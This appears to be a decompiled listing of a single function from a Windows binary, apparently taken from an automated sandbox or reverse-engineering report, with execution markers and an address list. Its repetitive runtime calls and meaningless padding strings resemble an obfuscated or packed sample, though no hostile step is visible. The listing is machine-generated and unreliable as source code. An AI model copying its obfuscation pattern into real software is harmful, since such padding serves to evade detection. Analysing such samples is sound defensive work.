				signed int _v504;
				intOrPtr* _v508;
				signed int _v512;
				intOrPtr* _v516;
				signed int _v520;
				intOrPtr* _v524;
				signed int _v528;
				intOrPtr* _v532;
				signed int _v536;
				intOrPtr* _v540;
				signed int _v544;
				intOrPtr* _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _t894;
				char* _t898;
				char* _t902;
				signed int _t906;
				signed int _t910;
				signed int _t914;
				signed int _t918;
				signed int _t922;
				signed int _t926;
				signed int _t944;
				signed int _t948;
				signed int _t957;
				signed int _t961;
				signed int _t965;
				signed int _t969;
				signed int _t973;
				signed int _t977;
				signed int _t981;
				signed int _t995;
				signed int _t1000;
				signed int _t1004;
				signed int _t1008;
				signed int _t1012;
				signed int _t1028;
				signed int _t1032;
				signed int _t1037;
				signed int _t1041;
				signed int _t1045;
				signed int _t1049;
				signed int _t1068;
				signed int _t1072;
				signed int _t1076;
				signed int _t1080;
				signed int _t1088;
				signed int _t1095;
				signed int _t1099;
				signed int _t1103;
				signed int _t1107;
				signed int _t1112;
				signed int _t1116;
				char* _t1120;
				signed int _t1124;
				char* _t1128;
				signed int _t1141;
				signed int _t1145;
				char* _t1149;
				signed int _t1163;
				signed int _t1167;
				signed int _t1174;
				signed int _t1180;
				char* _t1182;
				signed int _t1186;
				signed int _t1190;
				signed int _t1194;
				signed int _t1198;
				signed int* _t1199;
				char* _t1200;
				signed int _t1211;
				signed int _t1215;
				signed int _t1219;
				signed int _t1223;
				char* _t1224;
				char* _t1225;
				signed int _t1238;
				signed int _t1242;
				signed int _t1256;
				signed int _t1260;
				signed int _t1264;
				signed int _t1268;
				signed int _t1279;
				signed int _t1284;
				signed int _t1289;
				signed int _t1293;
				void* _t1434;
				void* _t1436;
				intOrPtr _t1437;
				void* _t1438;
				void* _t1452;

				_t1437 = _t1436 - 0x18;
				 *[fs:0x0] = _t1437;
				L00401350();
				_v28 = _t1437;
				_v24 = 0x401198;
				_v20 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401356, _t1434);
				_v8 = 1;
				_v8 = 2;
				_push(L"Bovlamme1");
				_push(L"Unecliptic9");
				_push( &_v156); // executed
				L00401584(); // executed
				_v184 = L"stivstikkere";
				_v192 = 0x8008;
				_push( &_v156);
				_t894 =  &_v192;
				_push(_t894);
				L0040158A();
				_v236 = _t894;
				L0040157E();
				if(_v236 != 0) {
					_v8 = 3;
					if( *0x4223fc != 0) {
						_v308 = 0x4223fc;
					} else {
						_push(0x4223fc);
						_push(0x403c38);
						L00401578();
						_v308 = 0x4223fc;
					}
					_v236 =  *_v308;
					_t1279 =  *((intOrPtr*)( *_v236 + 0x14))(_v236,  &_v124);
					asm("fclex");
					_v240 = _t1279;
					if(_v240 >= 0) {
						_v312 = _v312 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c28);
						_push(_v236);
						_push(_v240);
						L00401572();
						_v312 = _t1279;
					}
					_v244 = _v124;
					_t1284 =  *((intOrPtr*)( *_v244 + 0x108))(_v244,  &_v196);
					asm("fclex");
					_v248 = _t1284;
					if(_v248 >= 0) {
						_v316 = _v316 & 0x00000000;
					} else {
						_push(0x108);
						_push(0x403c48);
						_push(_v244);
						_push(_v248);
						L00401572();
						_v316 = _t1284;
					}
					_v52 = _v196;
					L0040156C();
					_v8 = 4;
					if( *0x422010 != 0) {
						_v320 = 0x422010;
					} else {
						_push(0x422010);
						_push(0x40324c);
						L00401578();
						_v320 = 0x422010;
					}
					_t1289 =  &_v124;
					L00401566();
					_v236 = _t1289;
					_t1293 =  *((intOrPtr*)( *_v236 + 0x158))(_v236,  &_v108, _t1289,  *((intOrPtr*)( *((intOrPtr*)( *_v320)) + 0x300))( *_v320));
					asm("fclex");
					_v240 = _t1293;
					if(_v240 >= 0) {
						_v324 = _v324 & 0x00000000;
					} else {
						_push(0x158);
						_push(0x403c58);
						_push(_v236);
						_push(_v240);
						L00401572();
						_v324 = _t1293;
					}
					_push(0x87);
					_push(_v108);
					L0040155A();
					L00401560();
					L00401554();
					L0040156C();
				}
				_v8 = 6;
				_v148 = 0x80020004;
				_v156 = 0xa;
				_push(0);
				_push(0xffffffff);
				_push( &_v156);
				_push(L"Tosdede8");
				_push( &_v172);
				L00401542();
				_t898 =  &_v172;
				_push(_t898);
				_push(0x2008);
				L00401548();
				_v224 = _t898;
				_push( &_v224);
				_push( &_v68);
				L0040154E();
				_push( &_v172);
				_t902 =  &_v156;
				_push(_t902);
				_push(2);
				L0040153C();
				_t1438 = _t1437 + 0xc;
				_v8 = 7;
				E00403A60(); // executed
				_v224 = _t902;
				L00401536();
				if(_v224 == 0x22d3bf) {
					_v8 = 8;
					_push(L"phrontisterium");
					L00401530();
					L00401560();
					_v8 = 9;
					if( *0x422010 != 0) {
						_v328 = 0x422010;
					} else {
						_push(0x422010);
						_push(0x40324c);
						L00401578();
						_v328 = 0x422010;
					}
					_t1186 =  &_v124;
					L00401566();
					_v236 = _t1186;
					_t1190 =  *((intOrPtr*)( *_v236 + 0x48))(_v236,  &_v108, _t1186,  *((intOrPtr*)( *((intOrPtr*)( *_v328)) + 0x308))( *_v328));
					asm("fclex");
					_v240 = _t1190;
					if(_v240 >= 0) {
						_v332 = _v332 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x403cc4);
						_push(_v236);
						_push(_v240);
						L00401572();
						_v332 = _t1190;
					}
					_push(0);
					_push(0xffffffff);
					_push(1);
					_push(L"Calelectricity");
					_push(_v108);
					_push(L"STYRETABELLER");
					L0040152A();
					L00401560();
					L00401554();
					L0040156C();
					_v8 = 0xa;
					if( *0x422010 != 0) {
						_v336 = 0x422010;
					} else {
						_push(0x422010);
						_push(0x40324c);
						L00401578();
						_v336 = 0x422010;
					}
					_t1194 =  &_v124;
					L00401566();
					_v236 = _t1194;
					_t1198 =  *((intOrPtr*)( *_v236 + 0xa0))(_v236,  &_v108, _t1194,  *((intOrPtr*)( *((intOrPtr*)( *_v336)) + 0x2fc))( *_v336));
					asm("fclex");
					_v240 = _t1198;
					if(_v240 >= 0) {
						_v340 = _v340 & 0x00000000;
					} else {
						_push(0xa0);
						_push(0x403c58);
						_push(_v236);
						_push(_v240);
						L00401572();
						_v340 = _t1198;
					}
					_push(_v108);
					_t1199 =  &_v116;
					_push(_t1199);
					L00401524();
					_push(_t1199);
					_push(L"Tvivlsomst9");
					_t1200 =  &_v112;
					_push(_t1200);
					L00401524();
					_push(_t1200);
					E00403ABC();
					_v224 = _t1200;
					L00401536();
					_v244 =  ~(0 | _v224 == 0x000f33d5);
					_push( &_v116);
					_push( &_v108);
					_push( &_v112);
					_push(3);
					L0040151E();
					_t1452 = _t1438 + 0x10;
					L0040156C();
					if(_v244 != 0) {
						_v8 = 0xb;
						if( *0x422010 != 0) {
							_v344 = 0x422010;
						} else {
							_push(0x422010);
							_push(0x40324c);
							L00401578();
							_v344 = 0x422010;
						}
						_t1256 =  &_v124;
						L00401566();
						_v236 = _t1256;
						_t1260 =  *((intOrPtr*)( *_v236 + 0x50))(_v236,  &_v108, _t1256,  *((intOrPtr*)( *((intOrPtr*)( *_v344)) + 0x304))( *_v344));
						asm("fclex");
						_v240 = _t1260;
						if(_v240 >= 0) {
							_v348 = _v348 & 0x00000000;
						} else {
							_push(0x50);
							_push(0x403cc4);
							_push(_v236);
							_push(_v240);
							L00401572();
							_v348 = _t1260;
						}
						if( *0x422010 != 0) {
							_v352 = 0x422010;
						} else {
							_push(0x422010);
							_push(0x40324c);
							L00401578();
							_v352 = 0x422010;
						}
						_t1264 =  &_v128;
						L00401566();
						_v244 = _t1264;
						_t1268 =  *((intOrPtr*)( *_v244 + 0x170))(_v244,  &_v112, _t1264,  *((intOrPtr*)( *((intOrPtr*)( *_v352)) + 0x30c))( *_v352));
						asm("fclex");
						_v248 = _t1268;
						if(_v248 >= 0) {
							_v356 = _v356 & 0x00000000;
						} else {
							_push(0x170);
							_push(0x403cc4);
							_push(_v244);
							_push(_v248);
							L00401572();
							_v356 = _t1268;
						}
						_push(_v108);
						_push(_v112);
						L00401518();
						L00401560();
						_push( &_v112);
						_push( &_v108);
						_push(2);
						L0040151E();
						_push( &_v128);
						_push( &_v124);
						_push(2);
						L00401512();
						_v8 = 0xc;
						_push( &_v96);
						_push(_a4);
						_push(0x403d18);
						L0040150C();
						_t1452 = _t1452 + 0x24;
					}
					_v8 = 0xe;
					if( *0x422010 != 0) {
						_v360 = 0x422010;
					} else {
						_push(0x422010);
						_push(0x40324c);
						L00401578();
						_v360 = 0x422010;
					}
					_t1211 =  &_v124;
					L00401566();
					_v236 = _t1211;
					_t1215 =  *((intOrPtr*)( *_v236 + 0x110))(_v236,  &_v108, _t1211,  *((intOrPtr*)( *((intOrPtr*)( *_v360)) + 0x308))( *_v360));
					asm("fclex");
					_v240 = _t1215;
					if(_v240 >= 0) {
						_v364 = _v364 & 0x00000000;
					} else {
						_push(0x110);
						_push(0x403cc4);
						_push(_v236);
						_push(_v240);
						L00401572();
						_v364 = _t1215;
					}
					if( *0x422010 != 0) {
						_v368 = 0x422010;
					} else {
						_push(0x422010);
						_push(0x40324c);
						L00401578();
						_v368 = 0x422010;
					}
					_t1219 =  &_v128;
					L00401566();
					_v244 = _t1219;
					_t1223 =  *((intOrPtr*)( *_v244 + 0x100))(_v244,  &_v132, _t1219,  *((intOrPtr*)( *((intOrPtr*)( *_v368)) + 0x304))( *_v368));
					asm("fclex");
					_v248 = _t1223;
					if(_v248 >= 0) {
						_v372 = _v372 & 0x00000000;
					} else {
						_push(0x100);
						_push(0x403cc4);
						_push(_v244);
						_push(_v248);
						L00401572();
						_v372 = _t1223;
					}
					_push(0);
					_push(0);
					_push(_v132);
					_t1224 =  &_v156;
					_push(_t1224);
					L00401500();
					_push(_t1224);
					L00401506();
					_push(_t1224);
					_push(_v108);
					_t1225 =  &_v112;
					_push(_t1225);
					L00401524();
					_push(_t1225);
					E00403B14();
					_v224 = _t1225;
					L00401536();
					_v252 =  ~(0 | _v224 == 0x001350c4);
					_push( &_v112);
					_push( &_v108);
					_push(2);
					L0040151E();
					_push( &_v132);
					_push( &_v128);
					_push( &_v124);
					_push(3);
					L00401512();
					_t1438 = _t1452 + 0x2c;
					L0040157E();
					if(_v252 != 0) {
						_v8 = 0xf;
						if( *0x422010 != 0) {
							_v376 = 0x422010;
						} else {
							_push(0x422010);
							_push(0x40324c);
							L00401578();
							_v376 = 0x422010;
						}
						_t1238 =  &_v124;
						L00401566();
						_v236 = _t1238;
						_t1242 =  *((intOrPtr*)( *_v236 + 0x48))(_v236,  &_v108, _t1238,  *((intOrPtr*)( *((intOrPtr*)( *_v376)) + 0x30c))( *_v376));
						asm("fclex");
						_v240 = _t1242;
						if(_v240 >= 0) {
							_v380 = _v380 & 0x00000000;
						} else {
							_push(0x48);
							_push(0x403cc4);
							_push(_v236);
							_push(_v240);
							L00401572();
							_v380 = _t1242;
						}
						_v288 = _v108;
						_v108 = _v108 & 0x00000000;
						_v148 = _v288;
						_v156 = 8;
						_push(0);
						_push(0x80);
						_push( &_v156);
						_push( &_v172);
						L004014EE();
						_push( &_v172);
						_push( &_v176);
						L004014F4();
						_push( &_v176);
						_push( &_v64);
						L004014FA();
						L0040156C();
						_push( &_v172);
						_push( &_v156);
						_push(2);
						L0040153C();
						_t1438 = _t1438 + 0xc;
						_v8 = 0x10;
						_push(0xffffffff);
						L004014E8();
					}
				}
				_v8 = 0x13;
				E00403B58(); // executed
				L00401536();
				_v8 = 0x14;
				if( *0x422010 != 0) {
					_v384 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v384 = 0x422010;
				}
				_t906 =  &_v124;
				L00401566();
				_v236 = _t906;
				_t910 =  *((intOrPtr*)( *_v236 + 0x1e8))(_v236,  &_v196, _t906,  *((intOrPtr*)( *((intOrPtr*)( *_v384)) + 0x2fc))( *_v384));
				asm("fclex");
				_v240 = _t910;
				if(_v240 >= 0) {
					_v388 = _v388 & 0x00000000;
				} else {
					_push(0x1e8);
					_push(0x403c58);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v388 = _t910;
				}
				if( *0x422010 != 0) {
					_v392 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v392 = 0x422010;
				}
				_t914 =  &_v128;
				L00401566();
				_v244 = _t914;
				_t918 =  *((intOrPtr*)( *_v244 + 0x1f0))(_v244,  &_v200, _t914,  *((intOrPtr*)( *((intOrPtr*)( *_v392)) + 0x300))( *_v392));
				asm("fclex");
				_v248 = _t918;
				if(_v248 >= 0) {
					_v396 = _v396 & 0x00000000;
				} else {
					_push(0x1f0);
					_push(0x403c58);
					_push(_v244);
					_push(_v248);
					L00401572();
					_v396 = _t918;
				}
				if( *0x422010 != 0) {
					_v400 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v400 = 0x422010;
				}
				_t922 =  &_v132;
				L00401566();
				_v252 = _t922;
				_t926 =  *((intOrPtr*)( *_v252 + 0xe0))(_v252,  &_v204, _t922,  *((intOrPtr*)( *((intOrPtr*)( *_v400)) + 0x300))( *_v400));
				asm("fclex");
				_v256 = _t926;
				if(_v256 >= 0) {
					_v404 = _v404 & 0x00000000;
				} else {
					_push(0xe0);
					_push(0x403c58);
					_push(_v252);
					_push(_v256);
					L00401572();
					_v404 = _t926;
				}
				_v220 = _v204;
				_v216 = _v200;
				_v224 = 0x60ba6;
				_v212 = _v196;
				_v208 = 0x54e7;
				 *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v208,  &_v212,  &_v224,  &_v216,  &_v220);
				_push( &_v132);
				_push( &_v128);
				_push( &_v124);
				_push(3);
				L00401512();
				_v8 = 0x15;
				if( *0x422010 != 0) {
					_v408 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v408 = 0x422010;
				}
				_t944 =  &_v124;
				L00401566();
				_v236 = _t944;
				_t948 =  *((intOrPtr*)( *_v236 + 0x120))(_v236,  &_v224, _t944,  *((intOrPtr*)( *((intOrPtr*)( *_v408)) + 0x308))( *_v408));
				asm("fclex");
				_v240 = _t948;
				if(_v240 >= 0) {
					_v412 = _v412 & 0x00000000;
				} else {
					_push(0x120);
					_push(0x403cc4);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v412 = _t948;
				}
				_v228 = 0x2d4eba;
				 *((intOrPtr*)( *_a4 + 0x714))(_a4, _v224,  &_v228);
				L0040156C();
				_v8 = 0x16;
				L004014E2();
				_v224 = 0x5e0e95;
				_t957 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4, 0x1088,  &_v224,  &_v108);
				_v236 = _t957;
				if(_v236 >= 0) {
					_v416 = _v416 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x4038e8);
					_push(_a4);
					_push(_v236);
					L00401572();
					_v416 = _t957;
				}
				L00401554();
				_v8 = 0x17;
				if( *0x422010 != 0) {
					_v420 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v420 = 0x422010;
				}
				_t961 =  &_v124;
				L00401566();
				_v236 = _t961;
				_t965 =  *((intOrPtr*)( *_v236 + 0x60))(_v236,  &_v224, _t961,  *((intOrPtr*)( *((intOrPtr*)( *_v420)) + 0x300))( *_v420));
				asm("fclex");
				_v240 = _t965;
				if(_v240 >= 0) {
					_v424 = _v424 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x403c58);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v424 = _t965;
				}
				if( *0x422010 != 0) {
					_v428 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v428 = 0x422010;
				}
				_t969 =  &_v128;
				L00401566();
				_v244 = _t969;
				_t973 =  *((intOrPtr*)( *_v244 + 0x110))(_v244,  &_v108, _t969,  *((intOrPtr*)( *((intOrPtr*)( *_v428)) + 0x308))( *_v428));
				asm("fclex");
				_v248 = _t973;
				if(_v248 >= 0) {
					_v432 = _v432 & 0x00000000;
				} else {
					_push(0x110);
					_push(0x403cc4);
					_push(_v244);
					_push(_v248);
					L00401572();
					_v432 = _t973;
				}
				if( *0x422010 != 0) {
					_v436 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v436 = 0x422010;
				}
				_t977 =  &_v132;
				L00401566();
				_v252 = _t977;
				_t981 =  *((intOrPtr*)( *_v252 + 0x120))(_v252,  &_v228, _t977,  *((intOrPtr*)( *((intOrPtr*)( *_v436)) + 0x308))( *_v436));
				asm("fclex");
				_v256 = _t981;
				if(_v256 >= 0) {
					_v440 = _v440 & 0x00000000;
				} else {
					_push(0x120);
					_push(0x403cc4);
					_push(_v252);
					_push(_v256);
					L00401572();
					_v440 = _t981;
				}
				_v232 = _v224;
				 *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v232, _v108, _v228,  &_v196);
				_v40 = _v196;
				L00401554();
				L00401512();
				_v8 = 0x18;
				_t995 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v224, 3,  &_v124,  &_v128,  &_v132);
				_v236 = _t995;
				if(_v236 >= 0) {
					_v444 = _v444 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x4038e8);
					_push(_a4);
					_push(_v236);
					L00401572();
					_v444 = _t995;
				}
				_v100 = _v224;
				_v8 = 0x19;
				if( *0x422010 != 0) {
					_v448 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v448 = 0x422010;
				}
				_t1000 =  &_v124;
				L00401566();
				_v236 = _t1000;
				_t1004 =  *((intOrPtr*)( *_v236 + 0x48))(_v236,  &_v108, _t1000,  *((intOrPtr*)( *((intOrPtr*)( *_v448)) + 0x304))( *_v448));
				asm("fclex");
				_v240 = _t1004;
				if(_v240 >= 0) {
					_v452 = _v452 & 0x00000000;
				} else {
					_push(0x48);
					_push(0x403cc4);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v452 = _t1004;
				}
				if( *0x422010 != 0) {
					_v456 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v456 = 0x422010;
				}
				_t1008 =  &_v128;
				L00401566();
				_v244 = _t1008;
				_t1012 =  *((intOrPtr*)( *_v244 + 0xf8))(_v244,  &_v196, _t1008,  *((intOrPtr*)( *((intOrPtr*)( *_v456)) + 0x2fc))( *_v456));
				asm("fclex");
				_v248 = _t1012;
				if(_v248 >= 0) {
					_v460 = _v460 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x403c58);
					_push(_v244);
					_push(_v248);
					L00401572();
					_v460 = _t1012;
				}
				_v200 = _v196;
				_v292 = _v108;
				_v108 = _v108 & 0x00000000;
				L00401560();
				_v224 = 0x20032;
				 *((intOrPtr*)( *_a4 + 0x71c))(_a4, 0x4dde,  &_v224,  &_v112,  &_v200, L"Koaguleringerne7",  &_v116);
				_v296 = _v116;
				_v116 = _v116 & 0x00000000;
				L00401560();
				L00401554();
				_push( &_v128);
				_push( &_v124);
				_push(2);
				L00401512();
				_v8 = 0x1a;
				if( *0x422010 != 0) {
					_v464 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v464 = 0x422010;
				}
				_t1028 =  &_v124;
				L00401566();
				_v236 = _t1028;
				_t1032 =  *((intOrPtr*)( *_v236 + 0x130))(_v236,  &_v128, _t1028,  *((intOrPtr*)( *((intOrPtr*)( *_v464)) + 0x30c))( *_v464));
				asm("fclex");
				_v240 = _t1032;
				if(_v240 >= 0) {
					_v468 = _v468 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x403cc4);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v468 = _t1032;
				}
				_push(0);
				_push(0);
				_push(_v128);
				_push( &_v156); // executed
				L00401500(); // executed
				if( *0x422010 != 0) {
					_v472 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v472 = 0x422010;
				}
				_t1037 =  &_v132;
				L00401566();
				_v244 = _t1037;
				_t1041 =  *((intOrPtr*)( *_v244 + 0x1e0))(_v244,  &_v108, _t1037,  *((intOrPtr*)( *((intOrPtr*)( *_v472)) + 0x2fc))( *_v472));
				asm("fclex");
				_v248 = _t1041;
				if(_v248 >= 0) {
					_v476 = _v476 & 0x00000000;
				} else {
					_push(0x1e0);
					_push(0x403c58);
					_push(_v244);
					_push(_v248);
					L00401572();
					_v476 = _t1041;
				}
				if( *0x422010 != 0) {
					_v480 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v480 = 0x422010;
				}
				_t1045 =  &_v136;
				L00401566();
				_v252 = _t1045;
				_t1049 =  *((intOrPtr*)( *_v252 + 0x140))(_v252,  &_v196, _t1045,  *((intOrPtr*)( *((intOrPtr*)( *_v480)) + 0x30c))( *_v480));
				asm("fclex");
				_v256 = _t1049;
				if(_v256 >= 0) {
					_v484 = _v484 & 0x00000000;
				} else {
					_push(0x140);
					_push(0x403cc4);
					_push(_v252);
					_push(_v256);
					L00401572();
					_v484 = _t1049;
				}
				_v300 = _v108;
				_v108 = _v108 & 0x00000000;
				L00401560();
				L004014DC();
				L00401560();
				 *((intOrPtr*)( *_a4 + 0x720))(_a4,  &_v112, 0x41135d,  &_v116, _v196,  &_v120,  &_v156);
				_v304 = _v120;
				_v120 = _v120 & 0x00000000;
				L00401560();
				_push( &_v116);
				_push( &_v112);
				_push(2);
				L0040151E();
				_push( &_v128);
				_push( &_v136);
				_push( &_v132);
				_push( &_v124);
				_push(4);
				L00401512();
				L0040157E();
				_v8 = 0x1b;
				if( *0x422010 != 0) {
					_v488 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v488 = 0x422010;
				}
				_t1068 =  &_v124;
				L00401566();
				_v236 = _t1068;
				_t1072 =  *((intOrPtr*)( *_v236 + 0x120))(_v236,  &_v224, _t1068,  *((intOrPtr*)( *((intOrPtr*)( *_v488)) + 0x308))( *_v488));
				asm("fclex");
				_v240 = _t1072;
				if(_v240 >= 0) {
					_v492 = _v492 & 0x00000000;
				} else {
					_push(0x120);
					_push(0x403cc4);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v492 = _t1072;
				}
				if( *0x422010 != 0) {
					_v496 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v496 = 0x422010;
				}
				_t1076 =  &_v128;
				L00401566();
				_v244 = _t1076;
				_t1080 =  *((intOrPtr*)( *_v244 + 0x140))(_v244,  &_v196, _t1076,  *((intOrPtr*)( *((intOrPtr*)( *_v496)) + 0x304))( *_v496));
				asm("fclex");
				_v248 = _t1080;
				if(_v248 >= 0) {
					_v500 = _v500 & 0x00000000;
				} else {
					_push(0x140);
					_push(0x403cc4);
					_push(_v244);
					_push(_v248);
					L00401572();
					_v500 = _t1080;
				}
				_v200 = _v196;
				_v228 = _v224;
				_t1088 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v228, L"Hvepsetaljer",  &_v200,  &_v232);
				_v252 = _t1088;
				if(_v252 >= 0) {
					_v504 = _v504 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x4038e8);
					_push(_a4);
					_push(_v252);
					L00401572();
					_v504 = _t1088;
				}
				_v72 = _v232;
				_push( &_v128);
				_push( &_v124);
				_push(2);
				L00401512();
				_v8 = 0x1c;
				if( *0x422010 != 0) {
					_v508 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v508 = 0x422010;
				}
				_t1095 =  &_v124;
				L00401566();
				_v236 = _t1095;
				_t1099 =  *((intOrPtr*)( *_v236 + 0x180))(_v236,  &_v224, _t1095,  *((intOrPtr*)( *((intOrPtr*)( *_v508)) + 0x304))( *_v508));
				asm("fclex");
				_v240 = _t1099;
				if(_v240 >= 0) {
					_v512 = _v512 & 0x00000000;
				} else {
					_push(0x180);
					_push(0x403cc4);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v512 = _t1099;
				}
				if( *0x422010 != 0) {
					_v516 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v516 = 0x422010;
				}
				_t1103 =  &_v128;
				L00401566();
				_v244 = _t1103;
				_t1107 =  *((intOrPtr*)( *_v244 + 0x160))(_v244,  &_v132, _t1103,  *((intOrPtr*)( *((intOrPtr*)( *_v516)) + 0x308))( *_v516));
				asm("fclex");
				_v248 = _t1107;
				if(_v248 >= 0) {
					_v520 = _v520 & 0x00000000;
				} else {
					_push(0x160);
					_push(0x403cc4);
					_push(_v244);
					_push(_v248);
					L00401572();
					_v520 = _t1107;
				}
				_push(0);
				_push(0);
				_push(_v132);
				_push( &_v156);
				L00401500();
				if( *0x422010 != 0) {
					_v524 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v524 = 0x422010;
				}
				_t1112 =  &_v136;
				L00401566();
				_v252 = _t1112;
				_t1116 =  *((intOrPtr*)( *_v252 + 0x108))(_v252,  &_v196, _t1112,  *((intOrPtr*)( *((intOrPtr*)( *_v524)) + 0x300))( *_v524));
				asm("fclex");
				_v256 = _t1116;
				if(_v256 >= 0) {
					_v528 = _v528 & 0x00000000;
				} else {
					_push(0x108);
					_push(0x403c58);
					_push(_v252);
					_push(_v256);
					L00401572();
					_v528 = _t1116;
				}
				if( *0x422010 != 0) {
					_v532 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v532 = 0x422010;
				}
				_t1120 =  &_v140;
				L00401566();
				_v260 = _t1120;
				_t1124 =  *((intOrPtr*)( *_v260 + 0xd8))(_v260,  &_v200, _t1120,  *((intOrPtr*)( *((intOrPtr*)( *_v532)) + 0x300))( *_v532));
				asm("fclex");
				_v264 = _t1124;
				if(_v264 >= 0) {
					_v536 = _v536 & 0x00000000;
				} else {
					_push(0xd8);
					_push(0x403c58);
					_push(_v260);
					_push(_v264);
					L00401572();
					_v536 = _t1124;
				}
				_v204 = _v196;
				_v228 = _v224;
				_t1128 =  &_v156;
				L00401506();
				 *((intOrPtr*)( *_a4 + 0x724))(_a4, 0x4863,  &_v228, _t1128, _t1128,  &_v204, _v200);
				_push( &_v132);
				_push( &_v140);
				_push( &_v136);
				_push( &_v128);
				_push( &_v124);
				_push(5);
				L00401512();
				L0040157E();
				_v8 = 0x1d;
				if( *0x422010 != 0) {
					_v540 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v540 = 0x422010;
				}
				_t1141 =  &_v124;
				L00401566();
				_v236 = _t1141;
				_t1145 =  *((intOrPtr*)( *_v236 + 0x130))(_v236,  &_v128, _t1141,  *((intOrPtr*)( *((intOrPtr*)( *_v540)) + 0x304))( *_v540));
				asm("fclex");
				_v240 = _t1145;
				if(_v240 >= 0) {
					_v544 = _v544 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x403cc4);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v544 = _t1145;
				}
				L00401500();
				L004014E2();
				_v196 = 0x55da;
				_v224 = 0x3a4bff;
				_t1149 =  &_v156;
				L004014DC();
				L00401560();
				 *((intOrPtr*)( *_a4 + 0x728))(_a4,  &_v224, 0x361572,  &_v196, _t1149, _t1149, 0x6fee,  &_v112,  &_v200,  &_v156, _v128, 0, 0);
				_v76 = _v200;
				_push( &_v112);
				_push( &_v108);
				_push(2);
				L0040151E();
				_push( &_v128);
				_push( &_v124);
				_push(2);
				L00401512();
				L0040157E();
				_v8 = 0x1e;
				if( *0x422010 != 0) {
					_v548 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v548 = 0x422010;
				}
				_t1163 =  &_v124;
				L00401566();
				_v236 = _t1163;
				_t1167 =  *((intOrPtr*)( *_v236 + 0xf8))(_v236,  &_v196, _t1163,  *((intOrPtr*)( *((intOrPtr*)( *_v548)) + 0x304))( *_v548));
				asm("fclex");
				_v240 = _t1167;
				if(_v240 >= 0) {
					_v552 = _v552 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x403cc4);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v552 = _t1167;
				}
				_v200 = _v196;
				L004014E2();
				L004014E2();
				_t1174 =  *((intOrPtr*)( *_a4 + 0x704))(_a4, 0x2e8fdf, 0x45e2,  &_v108, 0x37d3ea,  &_v112,  &_v200);
				_v244 = _t1174;
				if(_v244 >= 0) {
					_v556 = _v556 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x4038e8);
					_push(_a4);
					_push(_v244);
					L00401572();
					_v556 = _t1174;
				}
				L0040151E();
				L0040156C();
				_v8 = 0x1f;
				_t1180 =  *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v156, 2,  &_v108,  &_v112);
				_v236 = _t1180;
				if(_v236 >= 0) {
					_v560 = _v560 & 0x00000000;
				} else {
					_push(0x708);
					_push(0x4038e8);
					_push(_a4);
					_push(_v236);
					L00401572();
					_v560 = _t1180;
				}
				L0040157E();
				_v20 = 0;
				_push(0x41eb3d);
				L00401554();
				L00401554();
				L00401554();
				L00401554();
				_push( &_v64);
				_push(0);
				L004014D6();
				_t1182 =  &_v68;
				_push(_t1182);
				_push(0);
				L004014D6();
				L00401554();
				L0040157E();
				L00401554();
				return _t1182;
			}

0x0041cc87
0x0041cc96
0x0041cca2
0x0041ccaa
0x0041ccad
0x0041ccba
0x0041ccc3
0x0041ccc6
0x0041ccd5
0x0041ccd8
0x0041ccdf
0x0041cce6
0x0041cceb
0x0041ccf6
0x0041ccf7
0x0041ccfc
0x0041cd06
0x0041cd16
0x0041cd17
0x0041cd1d
0x0041cd1e
0x0041cd23
0x0041cd30
